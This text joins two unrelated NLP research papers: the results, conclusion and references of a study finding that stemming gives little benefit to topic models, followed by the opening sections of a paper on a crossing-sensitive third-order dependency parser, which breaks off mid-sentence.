probability and importance of the stemmed form. While this does not produce a symmetric distribution, as we have not accounted for the increased probability of each word in a smaller vocabulary, it allows us to sort words by how much their probability of occurring has changed between treatments and how much that word affects the corpus as a whole. The second heuristic tests whether stemming in- creases or decreases certainty of the topic assign- ment for each stemmed word type. Intuitively, cor- rect conflation should reduce the information en- tropy across tokens of a given conflation class by forcing words with the same root to be treated as a single word in inference. Topic models are in- tuitively better when words are sparsely distributed across topics; consequently, we prefer lower entropy across topics, or mass concentrated in only a few topics. A negative value for a word type under this entropy metric favors the stemmed corpus, while a positive score favors the untreated corpus. In this case, for a given word type w, we use the topic assignments from the final iteration of Gibbs sampling to compute the number of instances of w assigned to each topic k. To preserve the sparsity inferred by the algorithm, we use this to generate a maximum-likelihood estimate of the probability dis- tribution of w being assigned to each topic, from which we can compute the Shannon entropy: Hwt(k) = − K∑ k=1 Nwk Nw log ( Nwk Nw ) , (7) where Nwk is the count of all tokens of type w as- signed to topic k. For each treated form of a word w by a treatment t, we also consider the inverse im- age t−1(w), or the set of all words that stem to have form w. We therefore compute a change in entropy using average H̄wt across all trials with treatment t and control t0 for a given corpus and topic count, ∆Hwt(k) = H̄wt(k) − H̄t−1(w)t0 (k), (8) where H̄t−1(w)t0 is the information entropy for the topic-word counts summed across all untreated types that conflate to type w under treatment t. 5 Results To evaluate the effects of conflation on topic mod- els, we produced several thousand inferred models. We apply the metrics described in Section 4, com- puting means and standard errors across trials with 292 the same topic count, corpus, and treatment where possible to ensure significance. 5.1 Treatment Strength Many factors contribute to the general concept of “strength” of a stemmer, but the most obvious sig- nal is the amount by which a stemmer reduces the vocabulary of a corpus. After stopword removal, we count the total number of unique word types in our stemmed corpus for each treatment and training cor- pus, as well as the average number of characters in each word after treatment. Comparing type-token ratios of rule-based stemmers to the untreated cor- pus gives a measurement of the ratio of untreated words to conflation classes under that treatment. We display these counts in Figure 1. The results of these stemming treatments already demonstrate that stemmer strength can depend heav- ily on the type of corpus on which it is applied. For instance, the Krovetz stemmer actually increases the size of the vocabulary of ArXiv, whereas it produces more vocabulary reduction than the lemmatizer on both IMDb and Yelp. The proportions of rule-based stemmer type-token ratios are consistent across cor- pora, with the exception of truncation on arXiv. The frequent use of scientific prefixes (such as “inter” and “anti”) and bad conversion from PDF format in arXiv lead truncation stemmers to conflate at a higher rate than they do on other corpora with re- spect to other rule-based stemmers. The three dif- ferent light stemming methods — the S-stemmer, the Krovetz stemmer, and the WordNet lemmatizer — perform similarly on the IMDb corpus, but vary substantially across the other three corpora. Character-token ratios vary less between corpora than type-token ratios. Five-truncation produces words with an average length near the Paice-Husk and Lovins stemmers. Not surprisingly, S-stemming produces an average word length slightly less than the untreated corpus, while the Krovetz stemmer and WordNet lemmatizer vary in strength across cor- pora. We also verify some expected results for these stemmers: truncation stemmers are very strong, with four-truncation reducing vocabulary size to one- fourth or one-fifth of the original. The Porter stem- mers behave similarly to each other, with slightly more liberal stemming by the Porter2 stemmer on Figure 1: Type-token ratio and character-token ratio vary substantially across training corpora and conflation treat- ments. Due to the context-sensitive stemming done by the Krovetz stemmer, it is possible for one untreated word type to map to multiple stemmed types, producing a greater type-to-token ratio for the ArXiv version of the Krovetz stemmer than for the original untreated corpus. all corpora but ArXiv. The Paice-Husk and Lovins stemmers are both stronger than Porter, while the S- stemmer is consistently weaker. While the vocabu- lary of a corpus affects the strength of each stemmer, it does little to affect the strengths of the rule-based stemmers relative to each other. 5.2 Held-Out Likelihood Using our normalized log likelihood measure from Equation 3, we can compare likelihoods across all our different treatments, as shown in Figure 2. We observe for all standard rule-based stemmers treat- ments provide little likelihood benefit apart from reducing the vocabulary size; the Porter stemming 293 Figure 2: While light conflation treatments may help particular corpora, word conflation generally decreases the statistical fit of a topic model proportionally to its strength as measured in normalized log likelihood. Con- fidence intervals are the p = 0.99 range of belonging to the distribution of that treatment’s normalized log likeli- hoods across at least 9 samples each. Higher values of normalized log likelihood represent better model fit. treatments result in normalized log likelihoods sig- nificantly lower than the unstemmed treatment. Sta- tistically, the Porter stemmers do not appear to be improving the quality of the model; they are merely reducing the possible unigrams it could generate in a moderately principled way. Both Paice/Husk and Lovins have the same problem, but as they are stronger stemmers, problems of overconflation seem to reduce the quality further. More surprising, however, is the mediocre per- formance of the WordNet lemmatizer. The fact that Yelp and IMDb do not see an improvement with use of the lemmatizer is easy to explain away: these corpora contain slang, misspellings, and plenty of proper names, enough to make lemmatization a challenge. However, we see the same result in the case of New York Times articles, an ideal corpus for topic modeling. While there are still many named entities, they arise in carefully-edited text with stan- dardized journalistic vocabulary. Other observations are less surprising. Five- truncation produces likelihoods comparable to the stronger Lovins and Paice/Husk stemmers, and sig- nificantly better than either for the 50-topic Yelp model. This may relate to the irregularities of re- view text: words elongated for emphasis (e.g. “hel- loooo”) and other oddities of online informal En- glish are hard for rule-based suffix stemmers to han- dle but still benefit from naı̈ve forms of conflation. The Porter and Porter2 stemmers are not signifi- cantly different in any case, which serves as com- forting validation that those not using the new gen- eration of the Porter stemmer are not losing much. 5.3 Topic Coherence Log likelihood measures can tell us about statisti- cal fit, but do not necessarily tell us about the actual apparent coherence of the model in terms of concep- tual similarity of words in a topic. In Figure 3, we display the negative average coherence scores from Equation 4 for each treatment. The hypothesis we test is that using a conflation treatment should map morphologically different words with a shared con- cept to the same word, automatically constraining the topic model to ensure closely-related words are proportionally present in the same topics. Our results do not conform to this intuition. The majority of treatments are statistically indistin- guishable from the untreated control with respect to coherence. The relative effects of these treat- ments on coherence are magnified as the number of topics increases; while no ArXiv treatment dif- fers significantly in coherence at 10 topics, at 200, the four strongest treatments (Lovins, Paice-Husk, five-truncation and four-truncation) are significantly worse. Four-truncation suffers a similar effect on IMDb at 50 and 200 topics. In contrast, four- truncation actually improves in coherence compared to other treatments on Yelp as the number of topics increases, reaching a significant level at 200 topics. 294 Figure 3: Conflation treatments introduce no significant difference in almost all cases in the resulting average neg- ative topic coherence of each model according to token assignments. Smaller values indicating better coherence, and error bars represent the p = 0.99 range of possible mean values. Given the lack of substantial statistical difference across a variety of treatments, it seems safe to con- clude that the use of stemmers is not substantially improving the encoding of word similarities in these topics. The topic model itself on the untreated cor- pus is perhaps already doing as good a job ensuring that words in the same conflation class have statisti- cally similar topic distributions. Unstemmed topics sometimes contain words from the same conflation class (e.g. “restaurant” versus “restaurants”). While these might give a slight ad- vantage in coherence measures, this case implies that the stemmers are not necessary for bringing to- gether morphological variants in topics. 5.4 Clustering Consistency Another hypothesized effect of stemming is that it will produce more consistent results by reducing the sensitivity of related words to random initialization. We can use variation of information (VOI) to un- derstand how these models differ from each other relative to how much they vary between random ini- tializations. We summarize the results in Figure 4. Within statistical error bounds, intra-treatment VOI is always less than or equal to the variation across treatments, and VOI increases as the number of topics increases. On ArXiv, the light treatments — the Krovetz stemmer, S-stemmer, and WordNet lemmatizer — behave indistinguishably from the untreated corpus. The intra-treatment VOI trend shows that stronger treatments generally result in less consistent models. This contradicts the intuition that stemming will help place words with similar meaning into the same topic. While stemming con- strains all conflated word types to share one prob- ability in each topic, it does not ensure that those probability distributions will favor few topics. There are two striking exceptions to this trend. The first is the Krovetz stemmer. The intra-treatment VOI of Krovetz topic models stays closer to that of the untreated corpus than the S-stemmer or the WordNet lemmatizer. However, the higher inter- treatment VOI between Krovetz and the unstemmed corpus suggests that the Krovetz stemmer produces small but significant changes in the optima of the topic model. For IMDb, NYT, and Yelp at 200 top- ics, and NYT again at 50 topics, the VOI between the untreated corpus and Krovetz-stemmed corpus is significantly greater than the VOI of the untreated corpus with itself. In contrast, the variation of infor- mation between untreated and S-stemmed corpora is only negligibly higher than the intra-treatment VOI of the S-stemmer. This is interesting given the repu- tation of Krovetz as a weak stemmer. The second exception is the five-truncation stem- mer. Though a very strong stemmer, its VOI is in- distinguishable from the heavier Lovins and Paice- Husk stemmers on most corpora, but when applied to Yelp with 200 topics, it actually does significantly better than either, in both intra-treatment and inter- treatment VOI with the unstemmed corpus. This ef- fect can be seen to a less significant extent in mod- 295 Figure 4: The variation of information between different treatments of corpora indicates that while light stemming may improve the comparative similarity of topic models, heavier stemmers produce less stable topic assignments. The minimum for statistical significance is computed as the maximum p = 0.01 value for any topic model as compared with itself (i.e. the 95% confidence interval on the diagonal). 296 els with fewer topics over Yelp. This does not im- ply that five-truncation is a competitive stemmer, but rather illustrates that by this measure strong stem- mers perform worse than a naive baseline on a cor- pus with short words and irregular text. 5.5 Influential Words To identify word types that positively or negatively affect the quality of the model after stemming, we use our idf-probability and entropy metrics for each word type. The idf-probability metric strongly indi- cates that while conflation improves probability of words on average, the improvement applied primar- ily to conflated words. Untreated words that do not share a conflation class under a treatment (e.g. “mar- quess”) often become less probable on average after stemming. Their inferred hyperparameters are larger and thus encourage less sparsity in stemmed topic models; as a result, the probability of rarer words in their own conflation classes decreases as that prob- ability is more distributed across topics. This also increases the entropy of stemmed words from a size- one conflation class. We can confirm several hypotheses from earlier in the paper using these methods. For entropy dif- ferences, those conflation classes with the greatest weighted probability improvement for the truncation stemmers in ArXiv include huge conflation classes of words with the same prefix but wildly different roots. In effect, these have forced sparsity where it should not necessarily have been, degrading coher- ence. As exemplified in the 50-topic NYT models, the Porter stemmer improves the likelihood of com- mon words, like “street” (TPscore = 5370) and “mr” (TPscore = 13945), an outcome aligned with the rule-based stemmer’s aim to cope well with com- mon words. But for rarer words like “purgative” (TPscore = −17.5) and “pranks” (TPscore = −15.4), no such improvement is seen. These com- mon words do not have extreme entropy values, which supports our hypothesis that while the likeli- hood of common words improves with Porter stem- ming, those words were already in the same topic and did not affect model coherence. While we cannot use the same entropy measurement on the context-sensitive lemmatizer, we see the same ef- fect, where the most-improved words are the most common, and the less-likely words in the stemmed model are rare words and names. Interesting results also arise from the five- truncation stemmer. Unlike prescriptive rule-based stemmers, the truncation stemmer does not produce more errors when typos arise; in fact, it can ac- commodate typos at the ends of words in a way that other stemmers cannot. While, once again, we observe that the word probabilities of truncated words are much improved for common words and slightly reduced for rare words, we discover that the best entropy improvements from untreated to stemmed words are elongated words and exclama- tions such as “eeeee” (∆Hw(k) = −2.56) and “haaaa” (∆Hw(k) = −3.25). At the opposite score extreme, several classes of words with many mis- spellings have increased entropy after stemming, but this is potentially misleading; topic models are very good at distinguishing dialects, and system- atic misspellings are likely to create differently- spelled but semantically similar topics in a many- topic model. Over one hundred words conflate to “defin” with five-truncation, including upwards of sixty misspellings of “definitely,” which removes distinction between good and bad spellers that might be correlated with other features. 6 Related Work We are not aware of other work evaluating a vari- ety of stemmers and conflation techniques on topic models. Some prior work exists that evaluates the effect of stemming. Several conflation methods were tested on a variety of document clustering algo- rithms by Han et al. (2012), finding that they could reduce the number of features effectively but that the correct choice of stemmer varied. More recently, Stankov et al. (2013) developed a stemmer to im- prove document clustering. Both of these techniques demonstrate an improvement in clustering results and a reduction in features required, with the for- mer also introducing the notion of tradeoff between the precision of lemmatization and the efficiency and strength of stemmers. Additionally, a variety of work exists in the gen- eral field of stemmer evaluation, though much of it centers on the information retrieval community. In particular, the work of Harman (1991) highlights some of the fundamental issues of strong stemming, 297 including the potential positive effect of light stem- mers like the S-removal stemmer. The notion of stemmer strength is detailed further by Frakes and Fox (2003), as well as several more precise met- rics of evaluation of stemmer strength. Survey pa- pers from Jivani (2011) and Rani et al. (2015) detail the different existing stemming and conflation tech- niques for machine learning applications, including several statistical stemming algorithms that do not rely on a fixed set of rules. Findings suggest that, while these statistical methods have potential, many are inefficient, complex, and difficult to calibrate well enough to produce good results. Though we look forward to seeing the future development of these stemmers, for this work we chose to focus on simpler and more widely used methods. 7 Conclusion Despite its abiding popularity, stemming does not improve coherence after controlling for the size of vocabulary, and may actually reduce predictive like- lihood and increase sensitivity to random initializa- tions. In most cases, the topic model was already grouping together common words with the same root on its own, and gained little by better model- ing rare words. Light treatments seem to fare better than strong stemmers, with Krovetz doing particu- larly well for well-proofread corpora, but the small differences between words that these target such as pluralization and verb conjugation are often already captured by semantic models like LDA. In certain cases, a stemmer may encode an as- sumption that is useful for coping with a corpus with heavy variation, as with the 5-truncation stemmer helping to correct misspellings on Yelp. While this does not improve the quality of the topic model by most measures, it may be suited for a particular task involving abnormally varied word forms to which the model is applied. However, for stemmers encod- ing standard rules of spelling and grammar, such a benefit is unlikely. Given the overly-strong effects of truncation stemming, we suggest using a stem- mer as a method of discovering misspellings to fix instead of as a way of repairing them. A common motivation for stemming is to display more succinct results by not repeating minor mor- phological variations (such as “place” and “places” Unstemmed room hotel stay rooms pool nice stayed strip night bed check clean bathroom desk casino vegas free front resort shower Stemmed after training room hotel stai pool nice strip night bed check clean bathroom desk casino vega free front resort shower Stemmed before training room hotel stai pool nice bed check strip night vega suit casino clean bath- room view desk resort dai walk area Table 4: An example topic from an unstemmed Yelp 50-topic model with redundant keywords demonstrates that stemming after modeling produces the same appar- ent high-probability words as stemming before. in the case of Yelp). As an alternative we suggest post-stemming the list of keywords, as shown in Ta- ble 4. Stemming a list of top words after modeling allows topic models to exploit the nuances of mor- phologies, such as “apple” and “apples” with respect to the company and the fruit, while still allowing the eventual viewer to browse through the resulting concepts quickly. Post-stemming is computationally much cheaper than stemming the full corpus, requir- ing only a slightly longer input list of most probable terms. Because context is unavailable for keywords and strong stemmers reduce readability, we would suggest using the S stemmer or a modification of the Porter stemmer to return to English word forms. Vocabulary curation can have a profound effect on the results of statistical models, yet procedures for vocabulary curation have largely been left to unex- amined convention and undocumented folk wisdom. We find that a commonly used method, stemming, provides little measurable benefit and may in fact be harmful. As text mining becomes more influential outside core NLP research, more attention must be paid to these issues. 8 Acknowledgements We would like to thank Jacob Gardner, Jack Hessel, Andrew Loeb, Brian McInnis, and Elly Schofield for helping to refine the writing in this paper. We also would like to thank the TACL editors Mark John- son and Hal Daumé III and the reviewers for their thoughtful comments and suggestions. The first au- thor was funded by a Cornell University Fellowship. 298 References Narayan L Bhamidipati and Sankar K Pal. 2007. Stem- ming via distribution-based word segregation for clas- sification and retrieval. Systems, Man, and Cyber- netics, Part B: Cybernetics, IEEE Transactions on, 37(2):350–360. Steven Bird, Ewan Klein, and Edward Loper. 2009. Nat- ural Language Processing with Python. O’Reilly Me- dia. Available at: http://www.nltk.org/book/. David M Blei, Andrew Y Ng, and Michael I Jordan. 2003. Latent dirichlet allocation. The Journal of Ma- chine Learning Research, 3:993–1022. Matt Chaput. 2010. Stemming library. Available at: https://bitbucket.org/mchaput/stemming. Antske Fokkens, Marieke Van Erp, Marten Postma, Ted Pedersen, Piek Vossen, and Nuno Freire. 2013. Off- spring from reproduction problems: What replication failure teaches us. In Proceedings of the 51st ACL, pages 1691–1701. William B Frakes and Christopher J Fox. 2003. Strength and similarity of affix removal stemming algorithms. In ACM SIGIR Forum, volume 37, pages 26–30. ACM. Kuzman Ganchev and Mark Dredze. 2008. Small sta- tistical models by random feature mixing. In Proceed- ings of the ACL08 HLT Workshop on Mobile Language Processing, pages 19–20. Justin Grimmer and Gary King. 2011. General pur- pose computer-assisted clustering and conceptualiza- tion. PNAS, 108(7):2643–2650. Pu Han, Si Shen, Dongbo Wang, and Yanyun Liu. 2012. The influence of word normalization in english docu- ment clustering. In Computer Science and Automation Engineering (CSAE), 2012 IEEE International Con- ference on, volume 2, pages 116–120. IEEE. Donna Harman. 1991. How effective is suffixing? Jour- nal of the American Society for Information Science, 42(1):7–15. Carina Jacobi, Wouter van Atteveldt, and Kasper Wel- bers. 2016. Quantitative analysis of large amounts of journalistic texts using topic modelling. Digital Jour- nalism, 4(1):89–106. Anjali Ganesh Jivani. 2011. A comparative study of stemming algorithms. International Journal of Com- puter Technology and Applications, 2(6):1930–1938. Matthew L Jockers and David Mimno. 2013. Significant themes in 19th-century literature. Poetics, 41(6):750– 769. Sowmya Kamath S, Atif Ahmed, and Mani Shankar. 2015. A composite classification model for web ser- vices based on semantic & syntactic information inte- gration. In Advance Computing Conference (IACC), 2015 IEEE International, pages 1169–1173. IEEE. Robert Krovetz. 1993. Viewing morphology as an in- ference process. In Proceedings of the 16th annual international ACM SIGIR conference on Research and development in information retrieval, pages 191–202. ACM. Jey Han Lau, David Newman, and Timothy Baldwin. 2014. Machine reading tea leaves: Automatically evaluating topic coherence and topic model quality. In Proceedings of the Association for Computational Lin- guistics, pages 530–539. Zhiyuan Liu, Wenyi Huang, Yabin Zheng, and Maosong Sun. 2010. Automatic keyphrase extraction via topic decomposition. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 366–376. Association for Computational Lin- guistics. Siaw Ling Lo, David Cornforth, and Raymond Chiong. 2015. Effects of training datasets on both the extreme learning machine and support vector machine for tar- get audience identification on twitter. In Proceedings of ELM-2014 Volume 1, pages 417–434. Springer. Julie B Lovins. 1968. Development of a stemming al- gorithm. Mechanical Translation and Computational Linguistics, 11:22–31. Prasenjit Majumder, Mandar Mitra, Swapan K Parui, Gobinda Kole, Pabitra Mitra, and Kalyankumar Datta. 2007. Yass: Yet another suffix stripper. ACM Trans- actions on Information Systems (TOIS), 25(4):18. Andrew K McCallum. 2002. Mallet: a ma- chine learning for language toolkit. Available at: http://mallet.cs.umass.edu. Marina Meilă. 2003. Comparing clusterings by the vari- ation of information. In Bernhard Schölkopf and Man- fred K. Warmuth, editors, Learning Theory and Kernel Machines, volume 2777 of Lecture Notes in Computer Science, pages 173–187. Springer Berlin Heidelberg. Massimo Melucci and Nicola Orio. 2003. A novel method for stemmer generation based on hidden markov models. In Proceedings of the 12th Inter- national Conference on Information and Knowledge Management (CIKM), pages 131–138. ACM. David Mimno, Hanna M Wallach, Edmund Talley, Miriam Leenders, and Andrew McCallum. 2011. Op- timizing semantic coherence in topic models. In Pro- ceedings of the Conference on Empirical Methods in Natural Language Processing, pages 262–272. Asso- ciation for Computational Linguistics. Yuhong Nan, Min Yang, Zhemin Yang, Shunfan Zhou, Guofei Gu, and XiaoFeng Wang. 2015. Uipicker: User-input privacy identification in mobile applica- tions. In 24th USENIX Security Symposium, pages 993–1008. Chris D Paice. 1990. Another stemmer. ACM SIGIR Forum, 24(3):56–61. 299 Martin F Porter. 1980. An algorithm for suffix stripping. Program, 14(3):130–137. Martin F Porter. 2001. Snowball: A lan- guage for stemming algorithms. Available at: http://www.snowball.tartarus.org/texts/introduction.html. SP Ruba Rani, B Ramesh, M Anusha, and JGR Sathi- aseelan. 2015. Evaluation of stemming techniques for text classification. International Journal of Computer Science and Mobile Computing, 4(3):165–171. Evan Sandhaus. 2008. The new york times anno- tated corpus. Linguistic Data Consortium, DVD: LDC2009T19. Ivan Stankov, Diman Todorov, and Rossitza Setchi. 2013. Enhanced cross-domain document clustering with a semantically enhanced text stemmer (sets). In- ternational Journal of Knowledge-based and Intelli- gent Engineering Systems, 17(2):113–126. Chuan Su. 2015. Machine learning for reducing the ef- fort of conducting systematic reviews in SE. Bachelor Thesis. Kristina Toutanova, Dan Klein, Christopher D Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic dependency network. In Pro- ceedings of the 2003 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics on Human Language Technology-Volume 1, pages 173–180. Association for Computational Lin- guistics. Hanna M Wallach, David M Mimno, and Andrew K Mc- Callum. 2009. Rethinking LDA: Why priors matter. In Advances in Neural Information Processing Sys- tems, pages 1973–1981. 300 work_577ikynqqjccxpgsyirnrp7bme ---- A Crossing-Sensitive Third-Order Factorization for Dependency Parsing A Crossing-Sensitive Third-Order Factorization for Dependency Parsing Emily Pitler∗ Google Research 76 9th Avenue New York, NY 10011 epitler@google.com Abstract Parsers that parametrize over wider scopes are generally more accurate than edge-factored models. For graph-based non-projective parsers, wider factorizations have so far im- plied large increases in the computational complexity of the parsing problem. This paper introduces a “crossing-sensitive” generaliza- tion of a third-order factorization that trades off complexity in the model structure (i.e., scoring with features over multiple edges) with complexity in the output structure (i.e., producing crossing edges). Under this model, the optimal 1-Endpoint-Crossing tree can be found in O(n4) time, matching the asymp- totic run-time of both the third-order projec- tive parser and the edge-factored 1-Endpoint- Crossing parser. The crossing-sensitive third- order parser is significantly more accurate than the third-order projective parser under many experimental settings and significantly less accurate on none. 1 Introduction Conditioning on wider syntactic contexts than sim- ply individual head-modifier relationships improves parsing accuracy in a wide variety of parsers and frameworks (Charniak and Johnson, 2005; McDon- ald and Pereira, 2006; Hall, 2007; Carreras, 2007; Martins et al., 2009; Koo and Collins, 2010; Zhang and Nivre, 2011; Bohnet and Kuhn, 2012; Martins et al., 2013). This paper proposes a new graph- based dependency parser that efficiently produces ∗The majority of this work was done while at the University of Pennsylvania. the globally optimal dependency tree according to a third-order model (that includes features over grand- parents and siblings in the tree) in the class of 1- Endpoint-Crossing trees (that includes all projective trees and the vast majority of non-projective struc- tures seen in dependency treebanks). Within graph-based projective parsing, the third- order parser of Koo and Collins (2010) has a run- time of O(n4), just one factor of n more expensive than the edge-factored model of Eisner (2000). In- corporating richer features and producing trees with crossing edges has traditionally been a challenge, however, for graph-based dependency parsers. If parsing is posed as the problem of finding the op- timal scoring directed spanning tree, then the prob- lem becomes NP-hard when trees are scored with a grandparent and/or sibling factorization (McDonald and Pereira, 2006; McDonald and Satta, 2007). For various definitions of mildly non-projective trees, even edge-factored versions are expensive, with edge-factored running times between O(n4) and O(n7) (Gómez-Rodrı́guez et al., 2011; Pitler et al., 2012; Pitler et al., 2013; Satta and Kuhlmann, 2013). The third-order projective parser of Koo and Collins (2010) and the edge-factored 1-Endpoint- Crossing parser described in Pitler et al. (2013) have some similarities: both use O(n4) time and O(n3) space, using sub-problems over intervals with one exterior vertex, which are constructed using one free split point. The two parsers differ in how the exterior vertex is used: Koo and Collins (2010) use the exterior vertex to store a grandparent in- dex, while Pitler et al. (2013) use the exterior ver- tex to introduce crossed edges between the point and 41 Transactions of the Association for Computational Linguistics, 2 (2014) 41–54. Action Editor: Joakim Nivre. Submitted 9/2013; Revised 11/2013; Published 2/2014. c©2014 Association for Computational Linguistics. Projective 1-Endpoint-Crossing Edge O(n3) O(n4) Eisner (2000) Pitler et al. (2013) CS-GSib O(n4) O(n4) Koo and Collins (2010) This paper Table 1: Parsing time for various output spaces and model factorizations. CS-GSib refers to the (crossing-sensitive) grand-sibling factorization described in this paper. the interval. This paper proposes merging the two parsers to achieve the best of both worlds – produc- ing the best tree in the wider range of 1-Endpoint- Crossing trees while incorporating the identity of the grandparent and/or sibling of the child in the score of an edge whenever the local neighborhood of the edge does not contain crossing edges. The crossing-sensitive grandparent-sibling 1-Endpoint- Crossing parser proposed here takes O(n4) time, matching the runtime of both the third-order pro- jective parser and of the edge-factored 1-Endpoint- Crossing parser (see Table 1). The parsing algorithms of Koo and Collins (2010) and Pitler et al. (2013) are reviewed in Section 2. The proposed crossing-sensitive factorization is de- fined in Section 3. The parsing algorithm that finds the optimal 1-Endpoint-Crossing tree according to this factorization is described in Section 4. The implemented parser is significantly more accurate than the third-order projective parser in a variety of languages and treebank representations (Section 5). Section 6 discusses the proposed approach in the context of prior work on non-projective parsing. 2 Preliminaries In a projective dependency tree, each subtree forms one consecutive interval in the sequence of input words; equivalently (assuming an artificial root node placed as either the first or last token), when all edges are drawn in the half-plane above the sen- tence, no two edges cross (Kübler et al., 2009). Two vertex-disjoint edges cross if their endpoints inter- leave. A 1-Endpoint-Crossing tree is a dependency tree such that for each edge, all edges that cross it share a common vertex (Pitler et al., 2013). Note that the class of projective trees is properly included within the class of 1-Endpoint-Crossing trees. To avoid confusion between intervals and edges, g h e = g h m + h m e (a) m is the child of h that e is descended from g h = g h + hm ss m (b) The edge ~ehm is added to the tree; s is m’s adjacent inner sibling = + hm h s r+1r msh (c) r is s’s outermost descendant; r + 1 is m’s innermost descendant Figure 1: Algorithm for grand-sibling projective parsing; the figures replicate Figure 6 in Koo and Collins (2010). ~eij denotes the directed edge from i to j (i.e., i is the parent of j). Interval notation ((i, j), [i, j], (i, j], or [i, j)) is used to denote sets of vertices between i and j, with square brackets indicating closed intervals and round brackets indicating open intervals. 2.1 Grand-Sibling Projective Parsing A grand-sibling factorization allows features over 4-tuples of (g, h, m, s), where h is the parent of m, g is m’s grandparent, and s is m’s adjacent in- ner sibling. Features over these grand-sibling 4- tuples are referred to as “third-order” because they scope over three edges simultaneously (~egh, ~ehs, and ~ehm). The parser of Koo and Collins (2010) pro- duces the highest-scoring projective tree according to this grand-sibling model by adding an external grandparent index to each of the sub-problems used in the sibling factorization (McDonald and Pereira, 2006). Figure 6 in Koo and Collins (2010) provided a pictorial view of the algorithm; for convenience, it is replicated in Figure 1. An edge ~ehm is added to the tree in the “trapezoid” step (Figure 1b); this allows the edge to be scored conditioned on m’s grandpar- ent (g) and its adjacent inner sibling (s), as all four relevant indices are accessible. 2.2 Edge-factored 1-Endpoint-Crossing Parsing The edge-factored 1-Endpoint-Crossing parser of Pitler et al. (2013) produces the highest scoring 1- 42 * Which cars do Americans 0 1 2 3 4 ?daysfavor most these 98765 Figure 2: A 1-Endpoint-Crossing non-projective English sentence from the WSJ Penn Treebank (Marcus et al., 1993), converted to dependencies with PennConverter (Johansson and Nugues, 2007). do Americans favor do ?daysfavor most these * do * Which cars do favor Figure 3: Constructing a 1-Endpoint-Crossing tree with intervals with one exterior vertex (Pitler et al., 2013). Endpoint-Crossing tree with each edge ~ehm scored according to Score(Edge(h, m)). The 1-Endpoint- Crossing property allows the tree to be built up in edge-disjoint pieces each consisting of intervals with one exterior point that has edges into the interval. For example, the tree in Figure 2 would be built up with the sub-problems shown in Figure 3. To ensure that crossings within a sub-problem are consistent with the crossings that happen as a result of combination steps, the algorithm uses four dif- ferent “types” of sub-problems, indicating whether the edges incident to the exterior point may be inter- nally crossed by edges incident to the left boundary point (L), the right (R), either (LR), or neither (N). In Figure 3, the sub-problem over [*, do] ∪{favor} would be of type R, and [favor, ?]∪{do} of type L. 2.2.1 Naı̈ve Approach to Including Grandparent Features The example in Figure 3 illustrates the difficulty of incorporating grandparents into the scoring of all edges in 1-Endpoint-Crossing parsing. The vertex favor has a parent or child in all three of the sub- problems. In order to use grandparent scoring for the edges from favor to favor’s children in the other two sub-problems, we would need to augment the problems with the grandparent index do. We also must add the parent index do to the middle sub- problem to ensure consistency (i.e., that do is in fact the parent assigned). Thus, a first attempt to score all edges with grandparent features within 1-Endpoint- Crossing trees raises the runtime from O(n4) to O(n7) (all of the four indices need a “predicted par- ent” index; at least one edge is always implied so one of these additional indices can be dropped). 3 Crossing-Sensitive Factorization Factorizations for projective dependency parsing have often been designed to allow efficient pars- ing. For example, the algorithms in Eisner (2000) and McDonald and Pereira (2006) achieve their ef- ficiency by assuming that children to the left of the parent and to the right of the parent are independent of each other. The algorithms of Carreras (2007) and Model 2 in Koo and Collins (2010) include grandparents for only the outermost grand-children of each parent for efficiency reasons. In a similar spirit, this paper introduces a variant of the Grand- Sib factorization that scores crossed edges indepen- dently (as a CrossedEdge part) and uncrossed edges under either a grandparent-sibling, grandparent, sib- ling, or edge-factored model depending on whether relevant edges in its local neighborhood are crossed. A few auxiliary definitions are required. For any parent h and grandparent g, h’s children are parti- tioned into interior children (those between g and h) and exterior children (the complementary set of chil- dren).1 Interior children are numbered from closest to h through furthest from h; exterior children are first numbered on the side closer to h from closest to h through furthest, then the enumeration wraps around to include the vertices on the side closer to g. Figure 4 shows a parent h, its grandparent g, and a possible sequence of three interior and four exterior children. Note that for a projective tree, there would not be any children on the far side of g. Definition 1. Let h be m’s parent. Outer(m) is the set of siblings of m that are in the same subset of h’s children and are later in the enumeration than m is. For example, in the tree in Figure 2, 1Because dependency trees are directed trees, each node ex- cept for the artificial root has a unique parent. To ensure that grandparent is defined for the root’s children, assume an artifi- cial parent of the root for notational convenience. 43 e1 e2i1i2i3 hge3 e4 Figure 4: The exterior children are numbered first begin- ning on the side closest to the parent, then the side closest to the grandparent. There must be a path from the root to g, so the edges from h to its exterior children on the far side of g are guaranteed to be crossed. Crossed(~ehs) ¬Crossed(~ehs) ¬GProj(~ehm) Edge(h, m) Sib(h, m, s) GProj(~ehm) Grand(g, h, m) GrandSib(g, h, m, s) Table 2: Part type for an uncrossed edge ~ehm for the crossing-sensitive third-order factorization (g is m’s grandparent; s is m’s inner sibling). Outer(most) = {days, cars}. Definition 2. An uncrossed edge ~ehm is GProj if both of the following hold: 1. The edge ~egh from h’s parent to h is not crossed 2. None of the edges from h to Outer(m) (m’s outer siblings) are crossed Uncrossed GProj edges include the grandparent in the part. The part includes the sibling if the edge ~ehs from the parent to the sibling is not crossed. Ta- ble 2 gives the factorization for uncrossed edges. The parser in this paper finds the optimal 1- Endpoint-Crossing tree according to this factorized form. A fully projective tree would decompose into exclusively GrandSib parts (as all edges would be uncrossed and GProj ). As all projective trees are within the 1-Endpoint-Crossing search space, the optimization problem that the parser solves includes all projective trees scored with grand-sibling fea- tures everywhere. Projective parsing with grand- sibling scores can be seen as a special case, as the crossing-sensitive 1-Endpoint-Crossing parser can simulate a grand-sibling projective parser by setting all Crossed(h, m) scores to −∞. In Figure 2, the edge from do to Americans is not GProj because Condition (1) is violated, while the edge from favor to most is not GProj because Condition (2) is violated. Under this definition, the vertices do and favor (which have children in mul- tiple sub-problems) do not need external grandpar- ent indices in any of their sub-problems. Table 3 CrossedEdge(*,do) Sib(cars, Which, -) CrossedEdge(favor,cars) Sib(do, Americans, -) Sib(do, favor, Americans) CrossedEdge(do,?) Sib(favor, most, -) Sib(favor, days, most) GSib(favor, days, these, -) Table 3: Decomposing Figure 2 according to the crossing-sensitive third-order factorization described in Section 3. Null inner siblings are indicated with -. lists the parts in the tree in Figure 2 according to this crossing-sensitive third-order factorization. 4 Parsing Algorithm The parser finds the maximum scoring 1-Endpoint- Crossing tree according to the factorization in Sec- tion 3 with a dynamic programming procedure rem- iniscent of Koo and Collins (2010) (for scoring un- crossed edges with grandparent and/or sibling fea- tures) and of Pitler et al. (2013) (for including crossed edges). The parser also uses novel 